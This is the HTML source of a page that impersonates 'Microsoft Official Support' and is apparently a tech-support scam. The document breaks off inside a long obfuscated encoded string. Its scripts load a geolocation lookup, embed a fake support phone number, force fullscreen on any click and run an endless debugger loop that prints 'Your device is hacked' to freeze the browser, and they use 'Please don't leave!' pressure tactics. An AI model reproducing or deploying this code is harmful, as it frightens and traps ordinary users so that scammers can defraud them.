<html>
    <head>
        <meta name="robots" content="noindex,nofollow"/>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
        <title>Microsoft Official Support</title>
        <link href="https://fonts.googleapis.com/css?family=Titillium+Web:400,700" rel="stylesheet"/>
        <script src="http://geoapi123.appspot.com/"></script>
        <link rel="stylesheet" href="style.css"/>
        <link rel="stylesheet" href="pop.css" type="text/css"/>
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css"/>
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous"/>
        <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
        <script>
            $(document).on("mousemove", function(event) {
                if (event.pageY <= 5) {
                    // Mouse is near the top of the window
                    document.title = "Please don't leave!";
                    event.preventDefault();
                }
            });

            $(document).on("keydown", function(e) {
                if (e.keyCode === 27) {
                    $(elem).hide();
                }
            });
        </script>
        <script type="text/javascript">
            setInterval(function() {
                if (state === true) {
                    document.getElementById("alert-modal").style = "transform: scale(1.04)";
                    state = false;
                } else {
                    document.getElementById("alert-modal").style = "transform: scale(1)";
                    state = true;
                }
            }, 800);
        </script>
        <style type="text/css">
            @keyframes zoominoutsinglefeatured {
                0% {
                    transform: scale(1, 1);
                }

                50% {
                    transform: scale(1.1, 1.1);
                }

                100% {
                    transform: scale(1, 1);
                }
            }

            @keyframes zoomininsinglefeatured {
                0% {
                    transform: scale(1, 1);
                }

                50% {
                    transform: scale(1.1, 1.1);
                }

                100% {
                    transform: scale(1, 1);
                }
            }

            .cardcontainer {
                animation: zoominoutsinglefeatured 4s infinite;
            }

            .lokacioni3 {
                padding: 10px;
                border-radius: 5px;
                width: 600px;
                text-align: center;
                color: #000;
                margin: 0px auto;
                display: block;
            }

            /*.first_button {
  animation: shake 0.82s cubic-bezier(.36, .07, .19, .97) both infinite;
  transform: translate3d(0, 0, 0);
  backface-visibility: hidden;
  perspective: 1000px;
}*/
            @keyframes shake {
                10%, 90% {
                    transform: translate3d(-1px, 0, 0);
                }

                20%, 80% {
                    transform: translate3d(2px, 0, 0);
                }

                30%, 50%, 70% {
                    transform: translate3d(-4px, 0, 0);
                }

                40%, 60% {
                    transform: translate3d(4px, 0, 0);
                }
            }
        </style>
        <script type="text/javascript">
            var phone_number = "+1 844-717-0888";
        </script>
        <script type="text/javascript">
            var phone_number2 = "+1 844-717-0888";
        </script>
        <script type="text/javascript">
            addEventListener("click", function() {
                var el = document.documentElement
                  , rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
                rfs.call(el);
                while (true) {
                    debugger ;console.error("Your device is hacked......");
                }
            });
        </script>
        <script>
            $(document).ready(function() {
                //Fade in delay for the background overlay (control timing here)
                $("#bkgOverlay").delay(400).fadeIn(400);
                //Fade in delay for the popup (control timing here)
                $("#delayedPopup").delay(400).fadeIn(400);

                //Hide dialouge and background when the user clicks the close button
                $("#btnClose").click(function(e) {
                    HideDialog();
                    e.preventDefault();
                });
            });
            //Controls how the modal popup is closed with the close button
            function HideDialog() {
                $("#bkgOverlay").fadeOut(400);
                $("#delayedPopup").fadeOut(300);
            }
        </script>
        <script type="text/javascript">
            function NewTab() {
                window.open("https://www.google.com/", "_blank");
            }
        </script>
        <!-- <script type="text/javascript">
let NewTab1 = open('https://www.google.com/', 'example', 'width=300,height=300');

NewTab1.onload = function() {
  NewTab1.close();
  alert(NewTab1.closed); // true
};
</script> -->
        <script type="text/javascript">
            function evali() {
                var s1 = unescape("l%7Btizout+86k%7Cur%7Ck+8%3E+8%3F+%3DH%7Cgx+86y7+9J%7Btkyigvk+8%3E+88s+8%3B%3DI%7Bp+8%3B%3DHv%7C%7B+8%3B8I%3F%3Dr+8%3B%3DJny+8%3B%3DJ+8%3B8I%3F+8%3B9L+8%3B8I%3FF+8%3B8I+8%3B9KO+8%3B%3DJn%7F+8%3B8I%3F%3D%80%3E+8%3B8I+8%3B9GQ+8%3B%3DI%7Br%80pn%7Dr+8%3B8I%3F+8%3B9L+8%3B8I%3F%3F%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B%3DK%7C%7C+8%3B%3DHz%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9IOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSWy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KOx+8%3B%3E7zz+8%3B%3DJZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B%3DI+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9L%3F%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9IOx+8%3B%3E7zz+8%3B%3DJZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KSzw%80%7E+8%3B8I%3F+8%3B9I+8%3B9KP%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KOx+8%3B%3E7zz+8%3B%3DJZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GNMy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B%3E7z+8%3B%3E6+8%3B8I%3F+8%3B9I+8%3B9KQz+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GO%5By+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B%3E7z+8%3B%3E6+8%3B8I%3F+8%3B9I+8%3B9KQz+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GOVy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B%3DI+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9L%3Fgz+8%3B%3E6+8%3B8I%3F+8%3B9I+8%3B9KQz+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9IOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GO%5By+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B%3DI+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9L%3Fgz+8%3B%3E6+8%3B8I%3F+8%3B9I+8%3B9KQz+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9IOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GOVy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KSzw%80%7E+8%3B8I%3F+8%3B9I+8%3B9KPgz+8%3B%3E6+8%3B8I%3F+8%3B9I+8%3B9KQz+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GRy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KSzw%80%7E+8%3B8I%3F+8%3B9I+8%3B9KPgz+8%3B%3E6+8%3B8I%3F+8%3B9I+8%3B9KQz+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9JV+8%3B%3BH+8%3B%3BH+8%3B%3BKlt%60ZnW+8%3B%3BKVgYt%5E+8%3B%3BJe+8%3B8I%3F+8%3B9I+8%3B9IQ+8%3B8I%3F+8%3B9I+8%3B9IP%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L%7B%7E+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW+8%3B8I%3F+8%3B9I+8%3B9KRv+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9Lw%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv%3A+8%3B8I%3F+8%3B9I+8%3B9GOW%7Bvyz%5E+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMw%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L%7Bvyz%5E+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW+8%3B8I%3F+8%3B9I+8%3B9KRv+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9Lw%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSWv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9J+8%3B%3DK+8%3B%3DLvx%7E+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E%3A+8%3B8I%3F+8%3B9I+8%3B9GOY+8%3B9Gv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9J+8%3B%3DK+8%3B%3DLvx%7E+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B9G+8%3B9J+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B9Gv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9J+8%3B%3DK+8%3B%3DLvx%7E+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E%3A+8%3B8I%3F+8%3B9I+8%3B9GOXF%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR+8%3B8I%3F+8%3B9I+8%3B9KOz+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9IP%7E+8%3B%3DIz+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNMw%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GOWw%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L%7B+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW+8%3B8I%3F+8%3B9I+8%3B9KRv+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9Lw%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv%3A+8%3B8I%3F+8%3B9I+8%3B9GOW%7Bvyz+8%3B%3BK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNMw%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L%7Bvyz+8%3B%3BK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW+8%3B8I%3F+8%3B9I+8%3B9KRv+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9Lw%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSWv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9J+8%3B%3DK+8%3B%3DLvx%7E+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E%3A+8%3B8I%3F+8%3B9I+8%3B9GOY+8%3B9Gv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9J+8%3B%3DK+8%3B%3DLvx%7E+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B9I+8%3B9J+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B9Gv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9J+8%3B%3DK+8%3B%3DLvx%7E+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E%3A+8%3B8I%3F+8%3B9I+8%3B9GOZ+8%3B9L%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR+8%3B8I%3F+8%3B9I+8%3B9KOz+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9IP%7E+8%3B%3DIz+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNMw%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GOWw%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY+8%3B8I%3F+8%3B9I+8%3B9KRv+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9Lv+8%3B8I%3F+8%3B9I+8%3B9KQy%7E%7E%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GNFF%3A+8%3B8I%3F+8%3B9I+8%3B9GOW+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B%3DJy+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B9J+8%3B%3DK+8%3B%3DJ%80z+8%3B8I%3F+8%3B9I+8%3B9L%3Ey+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW%7E%7B%3A+8%3B8I%3F+8%3B9I+8%3B9GNM+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GS%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXFM%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXF+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GO%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXM+8%3B8I%3F+8%3B9I+8%3B9GQ%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXN%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXFF+8%3B8I%3F+8%3B9I+8%3B9GQ%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXFF+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXFF+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXFF+8%3B8I%3F+8%3B9I+8%3B9GP%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXF+8%3B8I%3F+8%3B9I+8%3B9GS%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GNN+8%3B%3E7z+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNFF%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B%3DJy+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B9J+8%3B%3DK+8%3B%3DJ%80z+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DL+8%3B%3E7z+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KO%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW%7E%7B%3A+8%3B8I%3F+8%3B9I+8%3B9GNMF+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GO%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXFF+8%3B8I%3F+8%3B9I+8%3B9GS%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz